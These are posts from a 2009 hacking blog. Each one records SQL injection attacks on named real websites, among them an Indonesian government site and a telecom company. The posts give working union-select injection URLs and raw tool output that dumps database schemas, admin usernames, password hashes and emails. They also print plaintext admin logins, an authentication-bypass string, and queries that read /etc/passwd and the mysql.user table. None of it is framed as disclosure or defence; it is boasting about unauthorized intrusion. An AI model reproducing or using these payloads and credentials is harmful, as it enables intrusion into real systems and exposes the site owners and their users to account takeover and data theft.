viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Sunday, March 22, 2009

[SQLi] http://www.queenbeehunt.com

11:14 PM Posted by viperfx07 No comments
I can't enjoy hacking as much as i could. It's really annoying. Below is my first hack in this month and it's unintended.

Tool: schemafuzz.py v5.0 mod by me & IntelliTamper
Admin panel: http://www.queenbeehunt.com/magnm/
Admin usr/pwd: admin:admin or andy:admin



[+] URL:http://www.queenbeehunt.com/finalist/?detail=87+and+1=2+union+select+1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:38:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "soprano_qbround2"
[+] Number of Tables: 10


[Database]: soprano_qbround2
[Table: Columns]
[0]comment: id_comment,comment,id_contestant,id_submission,name,email,publish,posted_on
[1]comment_contestant: id_comment_contestant,comment,id_contestant,id_contestant_comment,name,email,publish,posted_on
[2]contestant: id_contestant,name,user_name,password,real_password,image,thumbnail,last_login,score,hit_counter,comment_counter,address,personal_quote,email,bday,city,post_code,mobile_number,home_number,school,know,know_description,joined_on
[3]member: id_member,name,email,address,bday,city,post_code,mobile_number,home_number,school,know,know_description,personal_quote,score,photo,joined_on
[4]mission: id_mission,title,content,publish,posted_on
[5]news: id_news,title,content,image,thumbnail,publish,posted_on
[6]role: id_role,role_description
[7]submission: id_submission,title,content,image,thumbnail,video_link,id_contestant,id_mission,hit_counter,publish,posted_on
[8]tell_friend: id_tell_friend,id_contestant,name,email,friend,friend_email,sent_on
[9]user: id_user,username,name,password,email,user_role,last_login,join_date

[-] [22:53:59]
[-] Total URL Requests 117
[-] Done


[+] URL:http://www.queenbeehunt.com/finalist/?detail=87+and+1=2+union+select+1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:55:42
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "soprano_qbround2" Table "user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 2

[0] admin:21232f297a57a5a743894a0e4a801fc3:no_more_distance@yahoo.com:
[1] andy:21232f297a57a5a743894a0e4a801fc3:donald@duck.co:donald@duck.co:

[-] [22:56:13]
[-] Total URL Requests 4
[-] Done

Friday, February 13, 2009

Saturday, February 7, 2009

[SQLi] http://www.axis.co.id

12:02 PM Posted by viperfx07 No comments


Tools : schemafuzz.py v.50 mod by me
Admin panel: /login.php
Admin user/pwd: mommy:mommy
P.S: this vuln already been found, and it's on google


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:53:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Showing Tables & Columns from database "axiscoid_db"
[+] Number of Tables: 18


[Database]: axiscoid_db
[Table: Columns]
[0]tb_case: id,product,name,date,description,addtext
[1]tb_complain: id,userid,date,subject,complain
[2]tb_contact: Id,owner,name,email,mobile,ket
[3]tb_file: Id,name,type,folder,shared,created,update,owner,size
[4]tb_link: id,name,address,ket
[5]tb_mcontent: id,category,name,date,description,addtext
[6]tb_news: code,catagory,header,writer,date,news,pic,status,inc
[7]tb_news_status: code,name
[8]tb_news_topic: code,name
[9]tb_partner: id,name,email,address,phone,website,company
[10]tb_product: id,name,date,descreption,pic_front,logo,status,addtext
[11]tb_product_cat: code,name
[12]tb_product_status: code,name
[13]tb_promotion: id,word,date,picture,status,category,link
[14]tb_promotion_cat: id,name
[15]tb_search: id,keyword,address,desc,date
[16]tb_user: id,userid,password,nama,email,alamat,phone,mobile,tmp_lahir,tgl_lahir,status
[17]tb_user_cat: code,name

[-] [11:54:56]
[-] Total URL Requests 97
[-] Done


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:56:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Dumping data from database "axiscoid_db" Table "tb_user"
[+] Column(s) ['userid', 'password', 'email']
[+] Number of Rows: 1

[0] mommy:2623e0d1f4e1a3093ee71672ec1c771a:mommy@axis.co.id:mommy@axis.co.id:

[-] [11:56:16]
[-] Total URL Requests 3
[-] Done

Thursday, February 5, 2009

[SQLi] http://www.nafed.go.id

3:57 PM Posted by viperfx07 No comments


Tools: schemafuzz.py v5.0 mod by me.
Admin loc: /admin
Admin user/pwd: enter this "' or 'a'='a" (without double quotes) to both fields.
Ps: It's already been owned by some Turkey hackers. ^^


[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:58:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(user,0x3a,password),4,5,6,7,8/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8/*

[-] [15:58:19]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:48:17
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log
[+] Showing Tables & Columns from database "bpendb"
[+] Number of Tables: 110

Stop here because too many tables.

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

5:51 PM Posted by viperfx07 No comments


Dork : "Powered by endonesia 8.4"
Tools: schemafuzz.py v5.0 mod by me
Admin panel: /admin
Admin usr/pwd : Endonesia:jatwar22

[+] URL:http://www.endonesia.org/mod.php?mod=publisher&op=viewarticle&cid=1&artid=2+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 17:46:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: endorg_endorg
User: endorg_endorg@localhost
Version: 5.0.67-community
[+] Dumping data from database "endorg_endorg" Table "authors"
[+] Column(s) ['aid', 'pwd']
[+] Number of Rows: 1

[0] Endonesia:ca1db2899cf4bb64cd1b67ea68140bcc